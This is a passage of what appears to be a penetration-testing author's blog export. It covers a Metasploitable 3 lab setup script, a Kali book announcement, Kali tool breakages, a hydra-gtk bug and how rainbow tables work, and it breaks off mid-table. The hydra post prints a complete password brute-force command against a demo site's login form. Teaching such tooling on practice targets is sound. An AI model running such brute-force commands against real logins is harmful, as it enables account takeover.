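else          { Add-Check 'vagrant on PATH' 'FAIL' 'vagrant.exe not found' }
if ($packer)  { Add-Check 'packer on PATH' 'OK' $packer }
else          { Add-Check 'packer on PATH' 'FAIL' 'packer.exe not found; extract it into the vagrant bin directory' }

# Step 6: the vagrant-reload plugin.
if ($vagrant) {
    $plugins = & $vagrant plugin list 2>$null
    if ($plugins -match '^vagrant-reload\s') {
        Add-Check 'vagrant-reload plugin' 'OK' 'installed'
    } else {
        Add-Check 'vagrant-reload plugin' 'FAIL' 'run: vagrant plugin install vagrant-reload'
    }
}

# Step 6: free space on the work drive.
$drive = New-Object System.IO.DriveInfo $WorkDrive
if ($drive.IsReady) {
    $freeGB = [math]::Floor($drive.AvailableFreeSpace / 1GB)
    if ($freeGB -ge $MinFreeGB) { Add-Check "Free space on ${WorkDrive}:" 'OK' "$freeGB GB" }
    else { Add-Check "Free space on ${WorkDrive}:" 'FAIL' "$freeGB GB free, $MinFreeGB GB needed" }
} else {
    Add-Check "Free space on ${WorkDrive}:" 'FAIL' 'drive not ready'
}

$script:Results | Select-Object Check, Status, Detail | Format-Table -AutoSize
if ($script:Results | Where-Object { $_.Status -eq 'FAIL' }) { exit 1 }
```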
<div style="margin-top: 1em;">
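To move these two VirtualBox virtual machines to VMware, use VirtualBox's "<span style="color: #990000;"><b>File -> Export Appliance</b></span>" to export them as "<span style="color: #cc0000;"><b>*.ova</b></span>", then import that file into VMware to create the VMware virtual machine!</div>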
<div style="margin-top: 1em;">
For both Ubuntu and Win2K8, the login user name and password are <span style="color: blue; font-size: 1.5em;"><b>vagrant</b></span>/<span style="color: #990000; font-size: 1.5em;"><b>vagrant</b></span>.</div>
<div style="background-color: #993333; border: #aa0000 1px solid; color: yellow; font-size: 11pt; line-height: 160%; padding: 4px 4px 4px 2em; text-indent: -2em;margin-top:1em;">
Note: if you do not want to build it yourself, I provide the OVA file of the Ubuntu Metasploitable 3 at <b><a href="https://drive.google.com/open?id=1UgI6RR2YOIV1NvqDsAxYz19-DpQOPaJi"><span style="color: yellow;">https://drive.google.com/open?id=1UgI6RR2YOIV1NvqDsAxYz19-DpQOPaJi</span></a></b>.<br />
The <span style="color: white;"><b>Win2K8</b></span> <span style="color: white;"><b>metasploitable 3</b></span> involves operating system licensing, so I am not in a position to provide it! </div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-37100905342645564052019-12-15T20:48:00.001+08:002020-02-15T16:26:23.423+08:00New book 「Kali Linux滲透測試工具 第3版」 went on sale on 2019/12/25<div style="border: #ff3399 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1J6UrwFmyDpxQjBTRijskXR5ueqIdrwSC6cAiFrqR5wY7cyOBEkiTWxy7Tlyc06aSbVyk6oeAlFjSz2ajnXWwEM8hy7shSa6nX7RHnkrPeaRVrHCK0gkh0NA8wgdHOjapZM9DFObeo8B/s1600/ACN035700.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1J6UrwFmyDpxQjBTRijskXR5ueqIdrwSC6cAiFrqR5wY7cyOBEkiTWxy7Tlyc06aSbVyk6oeAlFjSz2ajnXWwEM8hy7shSa6nX7RHnkrPeaRVrHCK0gkh0NA8wgdHOjapZM9DFObeo8B/s320/ACN035700.jpg" width="236" /></a></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
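In November 2015, when Kali moved from 1.x to 2.0, I also rewrote the book as 「Kali Linux滲透測試工具 第2版」, and I am grateful to fellow enthusiasts for their support. Four years later Kali is still at version 2, but the bundled tools have changed considerably, so in May 2019 I rewrote the book again based on Kali 2019.2. While I was proofreading the first draft, Kali released 2019.3, so the book's content blends Kali 2019.2 and 2019.3.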
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
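This revision includes: <b>strengthened brute-force techniques</b>, <b>fixes for tools that fail to run in the Kali environment</b> (including ghost phisher, theharvester, huntersearch, clusterd and beef), <b>rewritten metasploit 5 usage</b>, <b>a new chapter on Bluetooth penetration testing</b>, <b>more Wi-Fi tools</b> and <b>an IPv6 toolkit</b>. Of course, <span style="color: #274e13;">some rarely used content has been dropped</span>. Admittedly, a large part of the previous edition is retained, because some tools have been updated without any change in how they are used.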
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
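Another focus of this revision is <b>Kismet</b> and <b>recon-ng</b>. The old and new versions of these two tools differ greatly in operation, and the book covers both the differences between the versions and how to use each.</div>
The book is available at the following bookstores:<br />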
<a href="http://www.gotop.com.tw/waweb2004/main/WebTL.aspx?ISBN=9789865023584" style="padding-left: 4em;" target="_blank">天瓏圖書</a><br />
<a href="https://www.books.com.tw/products/0010843942" style="padding-left: 4em;" target="_blank">博客來</a><br />
<a href="https://www.kingstone.com.tw/basic/2014713591791?zone=book&lid=book_class1_newbook1_nnnn" style="padding-left: 4em;" target="_blank">金石堂</a><br />
<a href="http://www.eslite.com/product.aspx?pgid=1001113692815503&kw=%e9%99%b3%e6%98%8e%e7%85%a7&pi=0" style="padding-left: 4em;" target="_blank">誠品</a><br />
<br />
<div style="border: #00cc00 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
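<span style="color: #b45f06;"><u>「Kali Linux滲透測試工具」 is not an introductory book</u></span>. Newcomers who plan to enter penetration testing are advised to start with my other book, 「<span style="color: #990000;"><b>網站滲透測試實務入門 第二版</b></span>」, an introductory book that takes the Web as its penetration target.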
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4yZEtMCuhCAnXx3wpYUCmQ4QXDRb7vJXd5x7kJm5uNDO4Cy5pOJ1h0lXGdB6KsC41nfGeaQs7nWbpTpVonq12uyCb_Nv_Y5QuNzO4d62XcMC_WFGOykBXTkNAEYPClRhpCkzBTxjxT4AT/s1600/ACN034900.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4yZEtMCuhCAnXx3wpYUCmQ4QXDRb7vJXd5x7kJm5uNDO4Cy5pOJ1h0lXGdB6KsC41nfGeaQs7nWbpTpVonq12uyCb_Nv_Y5QuNzO4d62XcMC_WFGOykBXTkNAEYPClRhpCkzBTxjxT4AT/s320/ACN034900.jpg" width="236" /></a></div>
</div>
<br />
<div style="border: #0066cc 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
If you are interested in nmap and want to go deeper into nmap scanning techniques and NSE scripts, see 「<span style="color: #990000;"><b>資安專家的nmap與NSE網路診斷與掃描技巧大公開</b></span>」, a book dedicated to using nmap.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheAviSvvH-ujFQVfXvH2LmhCuvi4-Nd8kQYmRMOKByuuAIg12tXR1PAm6olW2MNfit-zJdw_q0n6XTLQ04MVAMSFhqqPfTmZqE2ijglYWK78jx8Z7zN3xnBBA17KY9314BBtQIc9CG9_k/s1600/%25E6%259B%25B8%25E5%25B0%2581%25E9%259D%25A2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheAviSvvH-ujFQVfXvH2LmhCuvi4-Nd8kQYmRMOKByuuAIg12tXR1PAm6olW2MNfit-zJdw_q0n6XTLQ04MVAMSFhqqPfTmZqE2ijglYWK78jx8Z7zN3xnBBA17KY9314BBtQIc9CG9_k/s320/%25E6%259B%25B8%25E5%25B0%2581%25E9%259D%25A2.jpg" width="236" /></a></div>
</div>
<br />
<div style="border: #ff9900 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
If you use Metasploitable as a self-practice environment, you can also refer to 「<span style="color: #990000;"><b>Metasploitable|白帽駭客新兵訓練營(電子書)</b></span>」, which covers ways of attacking many of the vulnerabilities in Metasploitable 2.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3OvXbqeAnXbZQHDwQyCD79r7n10DhMXSehrq6Y2nrQTDBJBkh68-fohbEQzgM8u0WrWk4GSJbCeHQGW8pfvk-BFjQJgMbXg5q_NGJCo-0OnhUAZ6HYrb6uFUvYWd59IJoKipPqYOtMsHL/s1600/Metasploitable%25E7%2599%25BD%25E5%25B8%25BD%25E9%25A7%25AD%25E5%25AE%25A2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="398" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3OvXbqeAnXbZQHDwQyCD79r7n10DhMXSehrq6Y2nrQTDBJBkh68-fohbEQzgM8u0WrWk4GSJbCeHQGW8pfvk-BFjQJgMbXg5q_NGJCo-0OnhUAZ6HYrb6uFUvYWd59IJoKipPqYOtMsHL/s320/Metasploitable%25E7%2599%25BD%25E5%25B8%25BD%25E9%25A7%25AD%25E5%25AE%25A2.png" width="225" /></a></div>
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2tag:blogger.com,1999:blog-1967825056283652287.post-79898596889850512742019-09-29T18:55:00.004+08:002019-09-29T18:55:51.160+08:00Kali 2019.3 tripped me up again<div style="border: #000000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px;">
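Kali was recently updated to 2019.3. After a brief trial I found that it again differs from 2019.2. I have found three differences so far, and I expect more landmines are waiting: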
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
(1) The resources formerly under /usr/share/windows-binaries/ have moved to /usr/share/windows-resources/binaries/.
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
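(2) recon-ng was upgraded from 4.9.x to 5.0.x. Version 4.x installed the modules along with the tool; now users must install them themselves through the new marketplace command. Command usage has also changed considerably: for example, loading a module used to be "load MODULE_NAME" and is now "modules load MODULE_NAME". It takes some time to get used to the new way of working.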
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
(3) The former dnsmap-bulk.sh has been renamed dnsmap.bulk (no .sh suffix any more); no wonder I could not find the command.
</div>
<div style="margin-bottom: 8px;">
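These changes are inconvenient, but there is nothing to be done: if you use other people's tools, you follow their rules! My just-completed manuscript of 「Kali Linux滲透測試工具 第三版」 has to be revised again, which may affect the publication date.<span style="font-size: large;"><span style="color: #cc0000;"><b>囧</b></span></span></div>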
</div>
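雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-70228383465376056232019-07-27T20:26:00.000+08:002019-07-28T16:46:44.277+08:00Many penetration testing tools do not run properly on the 2019 version of Kali<span style="font-size: large;">Kali released 2019.2, which should have been good news, but the overhaul went too far. Several important tools in it either have missing functionality or fail with run-time errors, and worse, some report that they finished but produce no results at all. Writing 「Kali Linux滲透測試工具 第三版」 almost turned into a debugging exercise. </span><br />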
<br />
<span style="font-size: large;">The tools that cannot be used normally include: </span><br />
<ul>
<li><span style="font-size: large;">theHarvester </span></li>
<li><span style="font-size: large;">clusterd </span></li>
<li><span style="font-size: large;">Ghost Phisher </span></li>
<li><span style="font-size: large;">armitage </span></li>
<li><span style="font-size: large;">The integration of Beef with msfconsole also fails </span></li>
</ul>
<span style="font-size: large;">I sincerely hope the authors can release fixed versions soon! </span><br />
<br />
<br />
<span style="font-size: large;">(This post uses no colored text or borders, as a sign of mourning for Kali 2019.2) </span>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com4tag:blogger.com,1999:blog-1967825056283652287.post-39137809608226371602019-06-30T09:02:00.001+08:002019-06-30T09:02:55.727+08:00The strange behavior of hydra and hydra-gtk<div style="border: #ff0000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px; text-indent: 2em;">
<span style="color: #990000;">Today (2019/06/30), while experimenting, I found that<b> hydra-gtk</b> and <b>hydra</b> give inconsistent results.</span><br />
<a name='more'></a></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
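As you set options in <b>hydra-gtk</b>, the status bar at the bottom shows the corresponding hydra command. Starting the brute-force run from hydra-gtk found no matching credentials, as shown in Figure 1.</div>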
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQpWwJ3xKsRHAjl9y8EvYcvPUS-p_VfgDL6u-F5ldD6j9F25vo3EOLKxUP2KblrfG-da44nlPjXYktHYGBSLWXAt8xgnEK8nYo7G4lmne9bppWC9WMC-pk4ItT7kuXJxpZZfO76zn8rLpl/s1600/xhydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="1195" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQpWwJ3xKsRHAjl9y8EvYcvPUS-p_VfgDL6u-F5ldD6j9F25vo3EOLKxUP2KblrfG-da44nlPjXYktHYGBSLWXAt8xgnEK8nYo7G4lmne9bppWC9WMC-pk4ItT7kuXJxpZZfO76zn8rLpl/s400/xhydra.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: hydra-gtk finds no matching password</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="border: 1px green dotted; margin: 4px; padding: 4px;">
<span style="color: red;"><b>Command generated by hydra-gtk:</b></span>
<br />
<div style="margin-left: 1.5em;">
hydra -V -l admin -P /root/password.lst -t 8 -q -m /doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp" demo.testfire.net http-post-form</div>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
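But I know very well that the <span style="color: #990000;"><b>admin</b></span> / <span style="color: blue;"><b>admin</b></span> credentials work. I wondered whether I had filled in one of the <b>hydra-gtk</b> options wrongly, but repeated checks found nothing wrong, so I ran the command generated by <b>hydra-gtk</b> directly in a terminal. As Figure 2 shows, it really did find the <span style="color: #990000;"><b>admin</b></span> / <span style="color: blue;"><b>admin</b></span> credentials, so <b>hydra-gtk</b> clearly has a bug.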
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2BipADD-q7XBwJPsD6JRnFKW48Yawdz9EeGX8Y6j2iaWNR7pz4YCWRQlPRnVTmccujSn997FWN-MUjq2KOBFZWEOuIS1JBqN0c_fY6JCBKdyhJENv5-dSJc8qcG_H1L9OyRRpfhRGADKf/s1600/Console-hydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="523" data-original-width="1011" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2BipADD-q7XBwJPsD6JRnFKW48Yawdz9EeGX8Y6j2iaWNR7pz4YCWRQlPRnVTmccujSn997FWN-MUjq2KOBFZWEOuIS1JBqN0c_fY6JCBKdyhJENv5-dSJc8qcG_H1L9OyRRpfhRGADKf/s320/Console-hydra.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Running the command directly in a terminal works fine</td></tr>
</tbody></table>
<div style="margin-bottom: 8px;">
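<span style="color: #cc0000;"><b>A side note</b></span>: with the <b>debug</b> option of <b>hydra-gtk</b> enabled, the <b>start</b> tab outputs a large amount of information during a brute-force run, and <b>hydra-gtk</b> does not scroll the message box automatically. If you scroll the message box by hand at that point, <b>hydra-gtk</b> crashes.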
</div>
<hr />
<span style="color: red;"><span style="font-size: large;"><b>Conclusion:</b></span></span><br />
<div style="margin-bottom: 8px; text-indent: 2em;">
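The integration between <b>hydra-gtk</b> and <b>hydra</b> may be faulty. It is better to treat <b>hydra-gtk</b> purely as a command generator, to avoid drawing the wrong conclusion!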
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-35514331791441687882018-11-17T20:30:00.001+08:002019-04-18T14:28:27.966+08:00Embarrassed by My Own Ignorance: A Brief Look at How Rainbow Tables Work<a name='more'></a>
<div style="border: #ff0000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px; margin-left: 5em; text-indent: -5em;">
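<span style="color: red;"><b>Important notice</b></span>: this post is only a brief look at the basic principle of <span style="color: #cc0000;"><b>rainbow tables</b></span>, and it also clears up a misconception the author held for many years. It does not cover rainbow table implementation details. </div>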
<div style="background-color: #ffffcc; border: 3px groove #0033cc; margin: 8px; padding: 4px;">
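A rainbow table is a huge collection of hash values precomputed for every possible combination of letters. It is not necessarily specific to the MD5 algorithm; tables exist for all kinds of algorithms, and with one you can quickly crack all kinds of passwords. The more complex the password, the larger the rainbow table required; mainstream rainbow tables today are all over 100G.</div>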
<div style="margin-bottom: 8px; margin-top: -8px;">
(Excerpted from the <a href="http://www.twword.com/wiki/%E5%BD%A9%E8%99%B9%E8%A1%A8" target="_blank">TWWORD entry "彩虹表" (rainbow table)</a>)</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
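The passage above is what I had always taken a rainbow table to be. A few years ago my instructor taught it the same way in class. As a newcomer just stepping into penetration testing at the time, I was quite skeptical of this explanation<span style="font-size: small;"><sup><span style="color: #cc0000;">(Note)</span></sup></span>, but because my fundamentals were shaky I went along with it until now. Only after recently reading a foreign-language book did I realize that its description differed from my understanding.</div>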
<div style="margin-bottom: 8px; margin-left: 2em; text-indent: -2em;">
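<span style="color: #cc0000;"><b>Note:</b></span> by the description above, a rainbow table for 8-character passwords mixing upper- and lower-case letters and digits would need at least 5000 TB of storage. At 3 TB per hard drive, that is roughly 1400 drives. That was the doubt I had back then!?</div>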
<div style="margin-bottom: 8px; text-indent: 2em;">
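It turns out that a rainbow table does not simply store every plaintext password alongside its hash value. Instead it follows a time-memory trade-off strategy (spending time to save space): <span style="color: #cc0000;"><b>it stores only the head and tail</b></span> of each chain of computed results (call it a rainbow chain for now), and the values in between are recomputed at cracking time.</div>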
<div style="margin-bottom: 8px; text-indent: 2em;">
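If only the head and tail of a rainbow chain are stored, how is the relationship across the whole chain maintained? Two functions are involved: the function that computes the hash value (<b>hash function</b>) and the function that maps a hash value back to a plaintext (<b>reduction function</b>).</div>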
<div style="margin-bottom: 8px; margin-top: -16px;">
<ul>
<li>The <span style="color: #cc0000;"><b>hash function</b></span> converts a plaintext password into a hash value; it is written <span style="color: #38761d;"><b><span style="color: #009933;"> H( ) </span></b></span>.</li>
<li>The <span style="color: #cc0000;"><b>reduction function</b></span> maps a hash value to some plaintext password; it is written <span style="color: #009933;"><b> R( )</b></span>.</li>
</ul>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
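The reduction function does not recover the original plaintext password behind a hash value. It simply picks, with as little repetition as possible, one entry from the set of possible plaintext passwords to pair with the hash value. For example, suppose plaintext passwords are only 1 character long and can be any uppercase letter A to Z (26 combinations). The hash values of these passwords are then:</div>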
<div style="margin-bottom: 12px; margin-left: 12em; text-indent: -8em;">
<b>Ha</b> = H(A) , <b>Hb</b> = H(B), ... ..., <b>Hz</b> = H(Z) <span style="color: lime;"># Ha is the result of hashing the plaintext password A.</span></div>
<div style="margin-bottom: 8px;">
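The reduction function takes a given hash value and finds a corresponding plaintext password. If R(Ha) yields M, we write it as <b>Rm</b> = R(Ha). On that basis, suppose that reducing all of the hash values above gives the following results:</div>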
<table border="1" cellpadding="0" cellspacing="0" style="margin-top: -8px; width: 100%;">
<tbody>
<tr>
<td style="width: 25%;"><b>Rm</b> = R(Ha)=M</td><td style="width: 25%;"><b>Rl</b> = R(Hb)=L</td><td style="width: 25%;"><b>Rg</b> = R(Hc)=G</td><td><b>Ro</b> = R(Hd)=O</td>
</tr>
<tr>
<td><b>Rq</b> = R(He)=<b><span style="color: red;">Q</span></b></td><td><b>Rc</b> = R(Hf)=C</td><td><b>Rr</b> = R(Hg)=R</td><td><b>Rd</b> = R(Hh)=<b><span style="color: red;">D</span></b></td>
</tr>
<tr>
<td><b>Rn</b> = R(Hi)=N</td><td><b>Rx</b> = R(Hj)=X</td><td><b>Re</b> = R(Hk)=E</td><td><b>Rs</b> = R(Hl)=S</td>
</tr>
<tr>
<td><b>Rf</b> = R(Hm)=F</td><td><b>Rj</b> = R(Hn)=J</td><td><b>Rk</b> = R(Ho)=K</td><td><b>Ru</b> = R(Hp)=U</td>
</tr>
<tr>
<td><b>Rv</b> = R(Hq)=V</td><td><b>Ri</b> = R(Hr)=I</td><td><b>Rq</b> = R(Hs)=<b><span style="color: red;">Q</span></b></td><td><b>Rb</b> = R(Ht)=B</td>
</tr>
<tr>
<td><b>Rh</b> = R(Hu)=H</td><td><b>Rw</b> = R(Hv)=W</td><td><b>Rt</b> = R(Hw)=T</td><td><b>Ra</b> = R(Hx)=A</td>
</tr>
<tr>
<td><b>Rp</b> = R(Hy)=P</td><td><b>Rd</b> = R(Hz)=<b><span style="color: red;">D</span></b></td><td> </td><td> </td>
</tr>
</tbody>
</table>
<div style="margin-bottom: 8px; margin-top: 8px; text-indent: 2em;">
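Hash functions have a <b>collision</b> problem, and reduction functions have one too. The mapping table above shows that <b>Hh</b> and <b>Hz</b> both reduce to <b>D</b>; likewise, <b>He</b> and <b>Hs</b> both reduce to <b>Q</b>. Because of these collisions, <b>Y</b> and <b>Z</b> never appear among the reduction results. In this example, if you are given the hash value of Y or Z, the rainbow table built here cannot crack it.</div>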
<div style="margin-bottom: 8px;">
</div>
<div>
With the <b>hash function</b> and the <b>reduction function</b> explained, let's look at how the rainbow chain table is generated.</div>
<div style="margin-top: -16px;">
<ol>
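<li>Pick one plaintext password at random (say <b>M</b>) and compute its hash value with the <span style="color: #38761d;">hash function</span> to get <b>Hm</b>.</li>
<li>Feed <b>Hm</b> to the <span style="color: blue;">reduction function</span>, which maps it back to <b>F</b>.</li>
<li>Feed <b>F</b> to the <span style="color: #38761d;">hash function</span> to get another hash value, <b>Hf</b>.</li>
<li>Feed <b>Hf</b> to the <span style="color: blue;">reduction function</span>, which maps it back to <b>C</b>.</li>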
</ol>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
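Repeating this cycle yields one rainbow chain. But <b>how long should a chain be</b>? Chain length affects both the size of the rainbow table and the time spent cracking: <b>the longer the chain, the more space is saved, but cracking needs more recomputation and is therefore slower</b>. Below, a <b>short chain</b> (three stages) and a <b>long chain</b> (seven stages) are used to explain.</div>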
<div>
Building rainbow chains with three stages might give the following:</div>
<table border="0" cellpadding="0" cellspacing="0" style="border: 2px blue solid; line-height: 90%; margin-left: 1em; padding: 4px; width: 70%;">
<tbody>
<tr style="height: 50px;">
<td style="width: 29pt;"><span style="font-size: large;"><b><span style="color: red;">M</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hm</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 22pt;" width="30">F</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 25pt;" width="33">Hf</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 29pt;" width="39">C</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 31pt;" width="42">Hc</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 48pt;" width="64"><span style="font-size: large;"><b><span style="color: red;">G</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">I</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hi</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>N</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hn</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>J</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hj</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">X</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">Q</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hq</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>V</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hv</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>W</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hw</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">T</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">D</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hd</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>O</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ho</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>K</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">E</span></b></span></td>
</tr>
</tbody>
</table>
<div style="margin: -8px 4px 8px 12px;">
<span style="color: #741b47;"><b>~~more rows below, omitted~~</b></span></div>
<div style="margin-top: 8px;">
Building rainbow chains with seven stages might give the following:</div>
<div>
</div>
<table border="0" cellpadding="0" cellspacing="0" style="border: 2px blue solid; line-height: 90%; margin-left: 1em; padding: 4px; width: 100%;">
<tbody>
<tr style="height: 50px;">
<td style="width: 22pt;"><span style="font-size: large;"><b><span style="color: red;">M</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hm</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 22pt;" width="30">F</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 25pt;" width="33">Hf</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 17pt;" width="23">C</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 21pt;" width="28">Hc</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 19pt;" width="26">G</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hg</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 16pt;" width="22">R</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hr</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 18pt;" width="24">I</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 20pt;" width="27">Hi</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 17pt;" width="22">N</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 23pt;" width="31">Hn</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 21pt;" width="28"><span style="font-size: large;"><b><span style="color: red;">J</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">K</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>E</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>He</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>Q</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hq</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>V</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hv</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>W</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hw</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>T</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ht</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>B</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hb</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">L</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">P</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
